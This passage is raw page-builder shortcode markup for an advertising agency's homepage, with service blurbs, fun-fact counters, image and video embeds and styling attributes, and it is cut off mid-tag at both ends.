background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"Why We\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters 